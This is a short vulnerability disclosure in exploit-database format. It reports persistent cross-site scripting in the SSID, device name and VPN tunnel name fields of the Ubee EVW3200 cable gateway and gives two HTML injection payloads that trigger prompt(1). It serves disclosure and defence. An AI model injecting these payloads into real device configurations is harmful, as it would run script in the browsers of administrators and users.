# Exploit Title: Ubee EVW3200 - Multiple Persistent Cross Site Scripting# Google Dork: N/A# Date: 02-03-2014# Exploit Author: Jeroen - IT Nerdbox# Vendor Homepage: http://www.ubeeinteractive.com/# Software Link:
http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20# Version: All# Tested on: N/A# CVE : N/A### Description:## The SSID and Device name settings in the wireless configuration do not
sanitize their input.## The VPN Tunnel name is also vulnerable for persistent XSS### PoC:## Entering the following payload in one of these fields will execute
javascript:##"><input onmouseover=prompt(1)>or "><button
onclick=prompt(1)>XSS</button># ## More information can be found at:
http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/
